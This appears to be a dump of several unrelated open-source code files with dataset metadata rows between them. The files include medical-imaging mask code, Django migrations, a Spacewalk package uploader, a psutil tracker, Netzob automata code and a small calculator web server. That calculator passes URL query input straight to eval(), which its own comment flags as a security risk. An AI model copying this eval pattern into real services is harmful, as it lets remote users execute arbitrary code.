if not os.path.exists(outputDir):
print('Output path does not exist: {}'.format(outputDir))
sys.exit()
# make array of zeros
maskArray = np.zeros(shape=[x,y,z])
# make a square in the middle slice of 1s. this will be the mask
mask_sizeX = np.floor(x/4)
mask_sizeY = np.floor(y/4)
maskStartX = int(np.floor(x/2) - mask_sizeX/2)
maskEndX = int(maskStartX + mask_sizeX)
maskStartY = int(np.floor(y/2) - mask_sizeY/2)
maskEndY = int(maskStartY + mask_sizeY)
maskArray[maskStartX:maskEndX, maskStartY:maskEndY, int(np.floor(z/2))] = 1
# save as nib object
maskImage = nib.Nifti1Image(maskArray, affine=np.eye(4))
outputName = 'dummyMask_{}-{}-{}.nii.gz'.format(x,y,z)
outputPath = join(outputDir, outputName)
nib.save(maskImage, outputPath)
print('dummy mask saved as: {}'.format(outputPath))
if __name__ == '__main__':
# parse arguments
parser = argparse.ArgumentParser()
parser.add_argument('maskDims',
metavar='dim',
type=int,
nargs=3,
help='volume dims: x y z')
parser.add_argument('-o', '--outputDir',
default='.',
type=str,
help='output dir path for saving mask')
args = parser.parse_args()
print(args)
mkDummyMask(args.maskDims, args.outputDir)
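# Hedged usage sketch (added; the dimensions and output dir are examples):
#   python mkDummyMask.py 64 64 30 -o /tmp
# writes /tmp/dummyMask_64-64-30.nii.gz containing a 16x16 block of ones
# in the middle slice (z index 15).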
|
mit
| -8,057,642,820,469,725,000
| 28.289474
| 79
| 0.602426
| false
| 3.544586
| false
| false
| false
|
GreatLakesEnergy/sesh-dash-beta
|
seshdash/migrations/0006_auto_20170117_1613.py
|
1
|
2776
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2017-01-17 14:13
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('seshdash', '0005_remove_report_sent_report_date'),
]
operations = [
migrations.CreateModel(
name='Sensor_Node',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('node_id', models.IntegerField(choices=[(19, 19), (20, 20), (21, 21), (22, 22), (23, 23), (24, 24), (25, 25), (26, 26), (27, 27), (28, 28), (29, 29)], default=0)),
('sensor_type', models.CharField(choices=[(b'Temperature Humidity', b'th'), (b'Power Voltage', b'tx'), (b'Ph Ethenoal', b'pe')], max_length=40)),
('index1', models.CharField(default=b'ac_power1', max_length=40)),
('index2', models.CharField(default=b'pv_production', max_length=40)),
('index3', models.CharField(default=b'consumption', max_length=40)),
('index4', models.CharField(default=b'grid_in', max_length=40)),
('index5', models.CharField(default=b'AC_Voltage_out', max_length=40)),
('index6', models.CharField(blank=True, max_length=40, null=True)),
('index7', models.CharField(blank=True, max_length=40, null=True)),
('index8', models.CharField(blank=True, max_length=40, null=True)),
('index9', models.CharField(blank=True, max_length=40, null=True)),
('index10', models.CharField(blank=True, max_length=40, null=True)),
('index11', models.CharField(blank=True, max_length=40, null=True)),
('index12', models.CharField(blank=True, max_length=40, null=True)),
('site', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='seshdash.Sesh_Site')),
],
),
migrations.RemoveField(
model_name='sensor_bmv',
name='site',
),
migrations.RemoveField(
model_name='sensor_emonpi',
name='site',
),
migrations.RemoveField(
model_name='sensor_emonth',
name='site',
),
migrations.RemoveField(
model_name='sensor_emontx',
name='site',
),
migrations.DeleteModel(
name='Sensor_BMV',
),
migrations.DeleteModel(
name='Sensor_EmonPi',
),
migrations.DeleteModel(
name='Sensor_EmonTh',
),
migrations.DeleteModel(
name='Sensor_EmonTx',
),
]
|
mit
| -3,634,531,187,939,472,000
| 41.707692
| 180
| 0.552954
| false
| 3.751351
| false
| false
| false
|
renner/spacewalk
|
client/tools/rhnpush/connection.py
|
1
|
10533
|
#
# Copyright (c) 2008--2017 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#
import socket
import base64
import sys
# pylint: disable=F0401,E0611,W0632
from rhn import connections, rpclib
from spacewalk.common.usix import ListType, TupleType, IntType
from spacewalk.common.rhn_pkg import InvalidPackageError, package_from_filename
from spacewalk.common.usix import raise_with_tb
from rhnpush.utils import tupleify_urlparse
if sys.version_info[0] == 3:
from urllib.parse import splitport
from urllib.parse import urlparse
else:
from urlparse import urlparse
from urllib import splitport # pylint: disable=C0412
# pylint: disable=W0622
class ConnectionError(Exception):
pass
# pylint: disable=R0902
class BaseConnection:
def __init__(self, uri, proxy=None):
self._scheme, (self._host, self._port), self._path = parse_url(uri)[:3]
if proxy:
arr = rpclib.get_proxy_info(proxy)
self._proxy_host = arr[0]
self._proxy_port = arr[1]
self._proxy_username = arr[2]
self._proxy_password = arr[3]
else:
self._proxy_host = None
self._trusted_certs = None
self._connection = None
self._timeout = None
def set_timeout(self, timeout):
self._timeout = timeout
def get_connection(self):
if self._scheme not in ['http', 'https']:
raise ValueError("Unsupported scheme", self._scheme)
params = {}
if self._timeout is not None:
params['timeout'] = self._timeout
if self._proxy_host:
params.update({
'host': self._host,
'port': self._port,
'proxy': "%s:%s" % (self._proxy_host, self._proxy_port),
'username': self._proxy_username,
'password': self._proxy_password,
})
if self._scheme == 'http':
return connections.HTTPProxyConnection(**params)
params['trusted_certs'] = self._trusted_certs
return connections.HTTPSProxyConnection(**params)
else:
if self._scheme == 'http':
return connections.HTTPConnection(self._host, self._port, **params)
params['trusted_certs'] = self._trusted_certs
return connections.HTTPSConnection(self._host, self._port, **params)
def connect(self):
self._connection = self.get_connection()
self._connection.connect()
def putrequest(self, method, url=None, skip_host=0):
if url is None:
url = self._path
return self._connection.putrequest(method, url=url,
skip_host=skip_host)
def __getattr__(self, name):
return getattr(self._connection, name)
class PackageUpload:
header_prefix = "X-RHN-Upload"
user_agent = "rhn-package-upload"
def __init__(self, url, proxy=None):
self.connection = BaseConnection(url, proxy)
self.headers = {}
self.package_name = None
self.package_epoch = None
self.package_version = None
self.package_release = None
self.package_arch = None
self.checksum = None
self.checksum_type = None
self.nvra = None
self._resp_headers = None
self.packaging = None
self._response = None
def set_header(self, name, value):
if name not in self.headers:
vlist = self.headers[name] = []
else:
vlist = self.headers[name]
if not isinstance(vlist, (ListType, TupleType)):
vlist = [vlist]
vlist.append(value)
def send_http_headers(self, method, content_length=None):
try:
self.connection.connect()
except socket.error:
e = sys.exc_info()[1]
raise_with_tb(ConnectionError("Error connecting", str(e)), sys.exc_info()[2])
# Add content_length
if 'Content-Length' not in self.headers and \
content_length is not None:
self.set_header('Content-Length', content_length)
self.connection.putrequest(method)
# Additional headers
for hname, hval in self.headers.items():
if not isinstance(hval, (ListType, TupleType)):
hval = [hval]
for v in hval:
self.connection.putheader(str(hname), str(v))
self.connection.endheaders()
def send_http_body(self, stream_body):
if stream_body is None:
return
stream_body.seek(0, 0)
buffer_size = 16384
while 1:
buf = stream_body.read(buffer_size)
if not buf:
break
try:
self.connection.send(buf)
except IOError:
e = sys.exc_info()[1]
raise_with_tb(ConnectionError("Error sending body", str(e)), sys.exc_info()[2])
def send_http(self, method, stream_body=None):
if stream_body is None:
content_length = 0
else:
stream_body.seek(0, 2)
content_length = stream_body.tell()
self.send_http_headers(method, content_length=content_length)
self.send_http_body(stream_body)
self._response = self.connection.getresponse()
self._resp_headers = self._response.msg
return self._response
def upload(self, filename, fileChecksumType, fileChecksum):
"""
Uploads a file.
Returns (http_error_code, error_message)
Sets:
self.package_name
self.package_epoch
self.package_version
self.package_release
self.package_arch
"""
try:
a_pkg = package_from_filename(filename)
a_pkg.read_header()
except InvalidPackageError:
return -1, "Not an RPM: %s" % filename
# Set some package data members
self.package_name = a_pkg.header['name']
self.package_epoch = a_pkg.header['epoch']
self.package_version = a_pkg.header['version']
self.package_release = a_pkg.header['release']
if a_pkg.header.is_source:
if 1051 in a_pkg.header.keys():
self.package_arch = 'nosrc'
else:
self.package_arch = 'src'
else:
self.package_arch = a_pkg.header['arch']
self.packaging = a_pkg.header.packaging
nvra = [self.package_name, self.package_version, self.package_release,
self.package_arch]
if isinstance(nvra[3], IntType):
# Old rpm format
return -1, "Deprecated RPM format: %s" % filename
self.nvra = nvra
# use the precomputed passed checksum
self.checksum_type = fileChecksumType
self.checksum = fileChecksum
# Set headers
self.set_header("Content-Type", "application/x-rpm")
self.set_header("User-Agent", self.user_agent)
# Custom RHN headers
prefix = self.header_prefix
self.set_header("%s-%s" % (prefix, "Package-Name"), nvra[0])
self.set_header("%s-%s" % (prefix, "Package-Version"), nvra[1])
self.set_header("%s-%s" % (prefix, "Package-Release"), nvra[2])
self.set_header("%s-%s" % (prefix, "Package-Arch"), nvra[3])
self.set_header("%s-%s" % (prefix, "Packaging"), self.packaging)
if self.checksum_type == 'md5':
self.set_header("%s-%s" % (prefix, "File-MD5sum"), self.checksum)
else:
self.set_header("%s-%s" % (prefix, "File-Checksum-Type"), self.checksum_type)
self.set_header("%s-%s" % (prefix, "File-Checksum"), self.checksum)
a_pkg.input_stream.seek(0, 0)
self._response = self.send_http('POST', stream_body=a_pkg.input_stream)
a_pkg.input_stream.close()
retval = self.process_response()
self.connection.close()
return retval
def process_response(self):
status = self._response.status
reason = self._response.reason
if status == 200:
# OK
return status, "OK"
if status == 201:
# Created
return (status, "%s %s: %s-%s-%s.%s.rpm already uploaded" % (
self.checksum_type, self.checksum,
self.nvra[0], self.nvra[1], self.nvra[2], self.nvra[3]))
if status in (404, 409):
# Conflict
errstring = self.get_error_message(self._resp_headers)
return status, errstring
data = self._response.read()
if status == 403:
# In this case Authentication is no longer valid on server
# client needs to re-authenticate itself.
errstring = self.get_error_message(self._resp_headers)
return status, errstring
if status == 500:
print("Internal server error", status, reason)
errstring = self.get_error_message(self._resp_headers)
return status, data + errstring
return status, data
def get_error_message(self, headers):
prefix = self.header_prefix + '-Error'
text = [x[1] for x in headers.getaddrlist(prefix + '-String')]
# text is a list now, convert it to a string
text = '\n'.join(text)
# pylint: disable=W1505
text = base64.decodestring(text)
return text
def parse_url(url, scheme="http", path='/'):
_scheme, netloc, _path, params, query, fragment = tupleify_urlparse(
urlparse(url))
if not netloc:
# No scheme - trying to patch it up ourselves?
url = scheme + "://" + url
_scheme, netloc, _path, params, query, fragment = tupleify_urlparse(
urlparse(url))
if not netloc:
# XXX
raise Exception()
(host, port) = splitport(netloc)
if not _path:
_path = path
return (_scheme, (host, port), _path, params, query, fragment)
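# Illustrative examples (added; not in the original file). parse_url()
# patches a missing scheme with the default before splitting host and port:
#   parse_url("example.org/APP")      -> ('http', ('example.org', None), '/APP', '', '', '')
#   parse_url("https://host:8443/up") -> ('https', ('host', '8443'), '/up', '', '', '')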
|
gpl-2.0
| 2,458,659,510,662,937,600
| 33.762376
| 95
| 0.58236
| false
| 3.949381
| false
| false
| false
|
dmytro-ignatenko/kuzenko
|
python-client/client.py
|
1
|
2905
|
import httplib2
import json
import urllib
from optparse import OptionParser
#from AptUrl.Parser import parse
h = httplib2.Http()
host = 'http://localhost:8080/kuzenko-ws/api/'
def setHost(hostName) :
global host
host = hostName
def setDatabaseName(name) :
resp, content = h.request(host + 'database/' + name, "POST", '')
#print resp
print content
def listTables() :
resp, content = h.request(host + "table", "GET")
#print resp
print content
def makeTable(data):
name,rest = data[0], ','.join(data[1:])
resp, content = h.request(host + "table/" + name + '?' + urllib.urlencode({"columnTypes" : rest}), "POST", '')
#print resp
print content
def removeTable(name) :
resp, content = h.request(host + "table/" + name , "DELETE", '')
#print resp
print content
def addRow(data) :
name,rest = data[0], ','.join(data[1:])
resp, content = h.request(host + "table/" + name + '/data' + '?' + urllib.urlencode({"columnData" : rest}) , "POST", '')
#print resp
print content
def removeRow(data) :
name, data = data[0], ','.join(data[1:])
resp, content = h.request(host + "table/" + name + '/data' + '?' + urllib.urlencode({"columnData" : {'1':'3'}}), "DELETE", '')
#print resp
print content
def dropDatabase() :
resp, content = h.request(host + "/database", "DELETE", '')
#print resp
print content
def showTable(name) :
resp, content = h.request(host + "table/" + name + '/data', "GET")
#print resp
print content
def descartTables(data) :
name1,name2 = data[0],data[1]
resp, content = h.request(host + "table/" + name1 + '/descart/' + name2, "GET")
#print resp
print content
methods = {
"lstbl" : listTables,
"mktbl" : makeTable,
"rmtbl" : removeTable,
"addrw" : addRow,
"rmvrw" : removeRow,
"drpdb" : dropDatabase,
"swtbl" : showTable,
"dctbl" : descartTables,
}
parser = OptionParser()
parser.add_option('-d',"--directory", action="store", type="string", dest="directory")
parser.add_option('-c','--command',action='store',type='string',dest='command')
parser.add_option('-p','--parameters',action='store',type='string',dest='parameters')
print "Python client started..."
line = raw_input()
while line != 'exit' :
(option,_) = parser.parse_args(line.split(' '))
if option.directory is None or option.command is None :
print "Wrong command format"
line = raw_input()
continue
setDatabaseName(option.directory)
method = methods[option.command]
if option.parameters is None : method()
else :
l = option.parameters.split(';')
if len(l) == 1 :
method(l[0].split('=')[1])
else :
method([x.split('=')[1] for x in l])
line = raw_input()
|
mit
| 8,205,013,659,229,442,000
| 28.948454
| 132
| 0.582788
| false
| 3.466587
| false
| false
| false
|
rosspalmer/PerformanceTrack
|
tracker.py
|
1
|
3755
|
import csv
import datetime
import pickle
import psutil
import os
import sys
# Locations for storage and export files
DATA_STORE_FILE = 'data.pik' # Add folder path for data pickle
SYSTEM_DATA_EXTRACT_FILE = 'system_log.csv' # Add folder path for system data CSV extract
PROCESS_DATA_EXTRACT_FILE = 'process_log.csv' # Add folder path for process data CSV extract
# Process specific stats name filter
PROCESS_FILTER = ['java', 'python']
# Time for CPU Usage calculations (in seconds)
CPU_CALC_TIME = 1.0
# Log performance for system and process level metrics and store
def log_current_state(os_type):
time = datetime.datetime.now()
new_system_data = system_performance_metrics(time)
new_processes_data = process_performance_metrics(time, os_type)
store(new_system_data, new_processes_data)
# Analyze performance of system level metrics
def system_performance_metrics(time):
# Setup entry dictionary and log time
entry = {}
entry['datetime'] = time
# Log CPU statistics
entry['cpu_usage'] = psutil.cpu_percent(CPU_CALC_TIME)
# Log memory statistics
mem = psutil.virtual_memory()
entry['mem_total'] = mem.total
entry['mem_available'] = mem.available
entry['mem_used'] = mem.used
entry['mem_percent_used'] = entry['mem_used'] / entry['mem_total']
return entry
# Analyze performance of filtered processes
def process_performance_metrics(time, os_type):
filtered_processes = []
memory_label = None
if os_type == 'windows':
memory_label = 'memory_info'
elif os_type == 'linux':
memory_label = 'memory_full_info'
# Loop through process data
for process in psutil.process_iter(attrs=['pid', 'name', 'cpu_percent', memory_label]):
for process_filter_string in PROCESS_FILTER:
if process_filter_string in process.info['name']:
entry = {}
entry['datetime'] = time
entry['filter'] = process_filter_string
entry['name'] = process.info['name']
entry['pid'] = process.info['pid']
entry['cpu_usage'] = process.cpu_percent(CPU_CALC_TIME)
entry['rss_memory'] = process.info[memory_label].rss
entry['vms_memory'] = process.info[memory_label].vms
filtered_processes.append(entry)
return filtered_processes
# Store new metrics in data pickle
def store(new_system_data, new_processes_data):
if not os.path.isfile(DATA_STORE_FILE):
data = {'system': [], 'processes': []}
else:
data = pickle.load(open(DATA_STORE_FILE, 'rb'))
data['system'].append(new_system_data)
data['processes'].extend(new_processes_data)
pickle.dump(data, open(DATA_STORE_FILE, 'wb'))
# Generate CSV files from data pickle
def generate_extract():
data = pickle.load(open(DATA_STORE_FILE, 'rb'))
system_data = data['system']
process_data = data['processes']
system_data_headers = ['cpu_usage', 'datetime', 'mem_available', 'mem_percent_used', 'mem_total', 'mem_used']
write_csv(system_data, system_data_headers, SYSTEM_DATA_EXTRACT_FILE)
process_data_headers = ['cpu_usage', 'datetime', 'filter', 'name', 'pid', 'rss_memory', 'vms_memory']
write_csv(process_data, process_data_headers, PROCESS_DATA_EXTRACT_FILE)
# Write CSV file from a list of dictionaries
def write_csv(data, headers, file_location):
csv_file = open(file_location, 'w+', newline='')
writer = csv.DictWriter(csv_file, headers)
writer.writeheader()
writer.writerows(data)
if __name__ == '__main__':
os_type = sys.argv[2]
if sys.argv[1] == 'log':
log_current_state(os_type)
elif sys.argv[1] == 'extract':
generate_extract()
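# Hedged usage sketch (added; the OS argument must match one handled above):
#   python tracker.py log linux       # append one sample to data.pik
#   python tracker.py extract linux   # dump stored samples to the CSV logs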
|
apache-2.0
| -6,550,446,624,911,820,000
| 29.04
| 113
| 0.65273
| false
| 3.65628
| false
| false
| false
|
sdolemelipone/django-crypsis
|
crypsis_tests/migrations/0008_auto_20180117_1130.py
|
1
|
1097
|
# Generated by Django 2.0.1 on 2018-01-17 11:30
import crypsis.models
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('crypsis_tests', '0007_auto_20171222_1155'),
]
operations = [
migrations.AlterModelOptions(
name='orderitem',
options={'ordering': ['id'], 'verbose_name': 'Order line', 'verbose_name_plural': 'Order lines'},
),
migrations.AddField(
model_name='item',
name='desc',
field=models.CharField(default='', max_length=100),
),
migrations.AlterField(
model_name='contact',
name='xero_id',
field=models.CharField(blank=True, default='', help_text="Here you can enter the long id of the xero object to force the item it is sync'd with.", max_length=200),
),
migrations.AlterField(
model_name='order',
name='date',
field=crypsis.models.DateField(default=django.utils.timezone.now),
),
]
|
gpl-3.0
| 2,773,212,821,536,557,600
| 31.264706
| 175
| 0.58979
| false
| 4.062963
| false
| false
| false
|
dasbruns/netzob
|
src/netzob/Inference/Grammar/AutomataFactories/OneStateAutomataFactory.py
|
1
|
4587
|
# -*- coding: utf-8 -*-
#+---------------------------------------------------------------------------+
#| 01001110 01100101 01110100 01111010 01101111 01100010 |
#| |
#| Netzob : Inferring communication protocols |
#+---------------------------------------------------------------------------+
#| Copyright (C) 2011-2014 Georges Bossert and Frédéric Guihéry |
#| This program is free software: you can redistribute it and/or modify |
#| it under the terms of the GNU General Public License as published by |
#| the Free Software Foundation, either version 3 of the License, or |
#| (at your option) any later version. |
#| |
#| This program is distributed in the hope that it will be useful, |
#| but WITHOUT ANY WARRANTY; without even the implied warranty of |
#| MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the |
#| GNU General Public License for more details. |
#| |
#| You should have received a copy of the GNU General Public License |
#| along with this program. If not, see <http://www.gnu.org/licenses/>. |
#+---------------------------------------------------------------------------+
#| @url : http://www.netzob.org |
#| @contact : contact@netzob.org |
#| @sponsors : Amossys, http://www.amossys.fr |
#| Supélec, http://www.rennes.supelec.fr/ren/rd/cidre/ |
#+---------------------------------------------------------------------------+
#+----------------------------------------------
#| Standard library imports
#+----------------------------------------------
#+----------------------------------------------
#| Related third party imports
#+----------------------------------------------
#+----------------------------------------------
#| Local application imports
#+----------------------------------------------
from netzob.Common.Utils.Decorators import typeCheck, NetzobLogger
from netzob.Common.Models.Grammar.States.State import State
from netzob.Common.Models.Grammar.Transitions.Transition import Transition
from netzob.Common.Models.Grammar.Transitions.OpenChannelTransition import OpenChannelTransition
from netzob.Common.Models.Grammar.Transitions.CloseChannelTransition import CloseChannelTransition
@NetzobLogger
class OneStateAutomataFactory(object):
@staticmethod
@typeCheck(list, list)
def generate(abstractSession, symbolList):
"""Generate an automata that, according to an abstract
session, contains a main state where each request-response
couples are permitted.
"""
if len(abstractSession) < 1:
return
(client, server, symbol) = abstractSession[0] # We expect that the first message/symbol is emitted by the client.
# So we consider it as the initiator of the session.
sStart = State(name="Start state")
sMain = State(name="Main state")
sEnd = State(name="End state")
openTransition = OpenChannelTransition(startState=sStart, endState=sMain, name="Open")
it = iter(abstractSession)
inputSymbol = None
outputSymbols = None
while True:
try:
                (source, destination, symbol) = next(it)
if source == client:
if symbol is not None:
inputSymbol = symbol
outputSymbols = None
else:
if symbol is not None:
outputSymbols = [symbol]
if inputSymbol is not None and outputSymbols is not None:
mainTransition = Transition(startState=sMain, endState=sMain, inputSymbol=inputSymbol, outputSymbols=outputSymbols, name="Transition")
inputSymbol = None
outputSymbols = None
except StopIteration:
break
closeTransition = CloseChannelTransition(startState=sMain, endState=sEnd, name="Close")
from netzob.Common.Models.Grammar.Automata import Automata
return Automata(sStart, symbolList)
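# Hedged usage sketch (added; the session/symbol objects are assumptions and
# generateDotCode() availability depends on the Automata class):
#   automata = OneStateAutomataFactory.generate(abstractSession, symbolList)
#   print(automata.generateDotCode())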
|
gpl-3.0
| 978,344,859,303,798,100
| 51.079545
| 154
| 0.491381
| false
| 5.014223
| false
| false
| false
|
paolotozzo/SDIPy
|
sdipy/sender.py
|
1
|
7318
|
"""
sender.py
by Charles Fracchia, Copyright (c) 2013
Sender class module
This class defines data and methods for the sender in a packet
"""
import re, warnings
allowedAttributes = ["name","brand","model","modelNum"] #In future, this could be loaded dynamically from a reference JSON
class Sender(object):
"""docstring for Packet"""
def __init__(self, address, timeFormat, startTime="", **kwargs):
super(Sender, self).__init__()
if (self._validateAddress(address) != False) : #Validate submitted address
self.addressType = self._validateAddress(address)
self.address = address
if startTime != "":
if self._validateTimeFormat(timeFormat,startTime):
self.timeFormat = timeFormat
self.startTime = startTime
else:
raise ValueError("The specified time format or start time in the sender object is incorrect.")
else: #If a Start Time object was not passed
if self._validateTimeFormat(timeFormat):
self.timeFormat = timeFormat
else:
raise ValueError("The specified time format in the sender object is incorrect.")
#For each extra attribute add it to the object to expose it
for arg in kwargs:
if arg not in allowedAttributes: #If it's not an allowed attribute according to SDIP
allowedList = "" #Used for nicely formatted warning
for attribute in allowedAttributes: #For each of the attributes in the list
if allowedList != "": allowedList = allowedList + ", " + attribute #Nicely formatted :)
else: allowedList += attribute #Nicely formatted :)
warnings.warn("Invalid sender attribute passed. Attribute will not be set. Allowed attributes are: %s" % allowedList) #Warn the user
else:
setattr(self, arg, kwargs[arg]) #This sets the attribute with dynamic name
def __str__(self):
return "*********************\nSDIP Sender Object\nAddress: %s (%s)\n*********************" % (self.address,self.addressType)
def _validateAddress(self, address):
"""
Check that the [address] is a valid address and return its type
Return the address type ("mac", "beemac" or "ip") if the address is valid; raise a ValueError otherwise
Acceptable:
XBee MAC address formatted like AA:BB:CC:DD:EE:FF:GG:HH:GG:HH
IP address formatted like 000.000.255.255, each block has to be 0 <= n < 256
"""
addressType = [] #Used for storing regex matches
mac = '^[a-fA-F0-9][aceACE02468][:|\-]?([a-fA-F0-9]{2}[:|\-]?){4}[a-fA-F0-9]{2}$' #For regular mac addresses
beemac = '^[a-fA-F0-9][aceACE02468][:|\-]?([a-fA-F0-9]{2}[:|\-]?){6}[a-fA-F0-9]{2}$' #For XBee mac addresses
ip = '(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' #For IP addresses
regexes = {"mac":mac,"beemac":beemac,"ip":ip}
for regex in regexes:
regexFound = re.compile(regexes[regex]).search(address) #Do the regex search
if regexFound != None: #If it finds a match
addressType.append("%s" % regex) #append the type to an array, this way we can detect addresses that match multiple regexes
if len(addressType) != 1: #If we matched no pattern, or more than one
raise ValueError("The provided address is not correctly formatted. The address can be an IP, regular MAC address or ZigBee MAC address")
return False
else: #We correctly matched just 1 type
return addressType[0] #Return the address type matched
def _validateTimeFormat(self, timeformat, startTime=""):
"""
This validates the time format
Takes the timeformat as a string
Returns True if the timeformat is valid, False if not
"""
allowedTimeFormats = ["sec","microsec","millisec"]
allowedTimeTypes = ["epoch","rel"]
splitTime = timeformat.split("-")
#print splitTime #DEBUG
if (len(splitTime) == 2 and splitTime[0] in allowedTimeFormats and splitTime[1] in allowedTimeTypes): #Check that the timeformat is correctly formatted (guards against a missing "-")
if splitTime[1] == "rel": #Time is relative, need to look at the start time
if startTime != "": #StartTime was passed along so we're good
if self._validateStartTime(startTime): #Time to validate the StartTime object
return True #StartTime is good
else:
raise ValueError("You indicated a relative time format but the start time object is malformed")
return False #StartTime is malformed
else: #StartTime was not passed along but time is relative grrr...
raise KeyError("You indicated a relative time format but failed to pass a start time object")
return False
elif splitTime[1] == "epoch": #Time is absolute and uses unix epoch as reference
if startTime != "":
warnings.warn("You've passed a start time dictionnary but are using absolute timing (epoch in this case). Make sure you \
understand the different types of time units we support, cause it looks like you don't :)",UserWarning)
return True
else:
raise ValueError("Your time format string is unsupported. We currently only support relative (with start time) and epoch data timestamps")
return False #Currently no other formats supported
else:
raise ValueError("Your time format string is malformed")
return False #Malformed string
def _validateStartTime(self, startTime):
"""
Validates the startTime dictionary
Takes in a dictionary of the following form: {"format": "sec-epoch", "time": 1383842840}
Returns True if startTime is correctly formed or False if not
"""
allowedTimeFormats = ["sec","microsec","millisec"]
allowedTimeTypes = ["epoch","rel"]
try:
splitStartTime = startTime['format'].split("-")
#print splitStartTime #DEBUG
except KeyError:
raise KeyError("The start time dictionnary is malformed. It needs to be in the following form: {'format': 'sec-epoch', 'time': 1383842840}")
if (splitStartTime[0] in allowedTimeFormats and splitStartTime[1] in allowedTimeTypes): #Check that the starttime is correctly formatted
try:
if type(startTime['time']) == int:
return True
else:
return False
except KeyError:
raise KeyError("The start time dictionnary is malformed. It needs to be in the following form: {'format': 'sec-epoch', 'time': 1383842840}")
else:
return False #the startTimeFormat is not correctly formatted
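# Illustrative usage (not part of the original module; values are examples).
# "sec-epoch" combines the allowed time format "sec" with the time type "epoch",
# and "name" is one of the allowedAttributes declared above.
# sender = Sender("AA:BB:CC:DD:EE:FF", "sec-epoch", name="bench-sensor")
# print(sender)  # shows the address and the detected address type ("mac")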
|
mit
| 6,683,428,774,023,159,000
| 52.423358
| 148
| 0.595655
| false
| 4.470373
| false
| false
| false
|
tebeka/pythonwise
|
macapp/humblecalc.py
|
1
|
1479
|
#!/usr/bin/env python
# Very humble calculator, written as "Web Desktop Application"
__author__ = "Miki Tebeka <miki@mikitebeka.com>"
from __future__ import division
from math import *
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
from urlparse import urlparse
from cgi import parse_qs
import httplib
class RequestHandler(SimpleHTTPRequestHandler):
def do_GET(self):
o = urlparse(self.path)
if o.path == "/eval":
self.eval(o.query)
elif o.path == "/quit":
self.end_headers()
self.wfile.write("Bye")
self.wfile.flush()
# self.server.shutdown() hangs, so we do it the brutal way
import os; os._exit(0)
else:
SimpleHTTPRequestHandler.do_GET(self)
def eval(self, query):
q = parse_qs(query)
expr = q.get("expr", [""])[0]
try:
# FIXME: Never do this on production, this is a huge security risk
result = str(eval(expr))
except Exception, e:
result = "ERROR"
self.send_response(httplib.OK)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(result)
if __name__ == "__main__":
import webbrowser
port = 8822
server = HTTPServer(("", port), RequestHandler)
webbrowser.open("http://localhost:%s" % port)
server.serve_forever()
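# Illustrative requests once the server is running (port 8822 as set above):
# curl 'http://localhost:8822/eval?expr=2%2B2'  -> "4"
# curl 'http://localhost:8822/quit'             -> "Bye" (terminates the server)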
|
bsd-3-clause
| -1,853,744,245,115,174,100
| 29.183673
| 78
| 0.615281
| false
| 3.811856
| false
| false
| false
|
AlexStarov/Shop
|
applications/product/templatetags/block_product.py
|
1
|
1391
|
# -*- coding: utf-8 -*-
from django_jinja import library
from django.template.loader import render_to_string
__author__ = 'AlexStarov'
@library.global_function()
def block_products(products, request, ):
from django.middleware.csrf import get_token
request_csrf_token = get_token(request, )
# request_csrf_token = request.META.get(u"CSRF_COOKIE", None, )
# request_csrf_token = request.COOKIES.get(u'csrftoken', None, )
# from proj.settings import MEDIA_URL
return render_to_string(template_name=u'product/templatetags/block_products.jinja2.html',
dictionary={'products': products,
'request': request,
'csrf_token': request_csrf_token, }, )
@library.global_function()
def block_product(product, choice, cycle, last_loop, ):
if last_loop:
margin_bottom = '0px'
else:
margin_bottom = '10px'
if cycle == 1:
margin_left = '0px'
else:
margin_left = '10px'
return render_to_string(template_name=u'product/templatetags/block_product.jinja2.html',
dictionary={'product': product,
'choice': choice,
'margin_bottom': margin_bottom,
'margin_left': margin_left, }, )
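# Example of the margin logic above (illustrative): the first product of a row
# (cycle == 1) gets margin_left '0px' and later items '10px'; the last rendered
# product (last_loop) gets margin_bottom '0px', all others '10px'.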
|
apache-2.0
| -2,443,777,753,299,930,600
| 38.742857
| 93
| 0.561467
| false
| 4.091176
| false
| false
| false
|
maya70/GraphMirrors
|
scripts/database/setup.py
|
1
|
4731
|
#!/usr/bin/python
# Reads from mysql database into a local sqlite database.
import mysql.connector
import sqlite3
import re
# Create Tables.
target = sqlite3.connect('data.db')
tc = target.cursor()
tc.execute('CREATE TABLE components (entity_id, component_id, component_type)')
# The inserts below also reference 'entities' and 'entity_pathways'; their
# schemas are inferred from those statements (assumed, not in the original).
tc.execute('CREATE TABLE entities (entity_id INTEGER PRIMARY KEY, entity_type TEXT, name TEXT, location TEXT, reactome_id INTEGER, uniprot_id TEXT)')
tc.execute('CREATE TABLE entity_pathways (entity_id INTEGER, pathway_id INTEGER, local_id TEXT)')
tc.execute('CREATE TABLE reactions (reaction_id INTEGER PRIMARY KEY, reaction_type TEXT, name TEXT, pathway_id, local_id TEXT)')
tc.execute('CREATE TABLE reaction_entities (reaction_id INTEGER, entity_id INTEGER, direction TEXT, PRIMARY KEY(reaction_id, entity_id))')
source = mysql.connector.connect(user = 'garba1', host = 'localhost', database = 'reactome')
sc = source.cursor()
sc.execute('SHOW TABLES')
tables = []
for (tablename,) in sc:
tables.append(tablename)
# Limit to 30 tables for testing purposes.
#tables = tables[:30]
last_completion = 0
table_count = 0
print('Components:')
# Do complex and converted after we have the source components defined.
for tablename in tables:
table_count = table_count + 1
completion = int(20 * table_count / len(tables))
if completion > last_completion:
last_completion = completion
print(' ', completion * 5, '%')
